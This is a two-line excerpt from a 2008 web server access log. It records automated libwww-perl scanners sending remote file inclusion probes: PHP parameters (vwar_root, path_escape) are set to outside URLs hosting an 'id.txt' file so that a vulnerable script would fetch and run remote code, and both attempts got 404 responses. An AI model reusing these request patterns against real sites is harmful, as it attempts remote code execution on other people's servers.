85.114.42.75 - - [23/Apr/2008:12:56:08 -0700] "GET /logs/access_071228.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.upfni.com//modules/Forums/admin/.muie/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.244.191.5 - - [23/Apr/2008:12:56:18 -0700] "GET /logs/access_080228.log/xzclf/1/posts/3_jobs/83_advertising/config.inc.php?path_escape=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
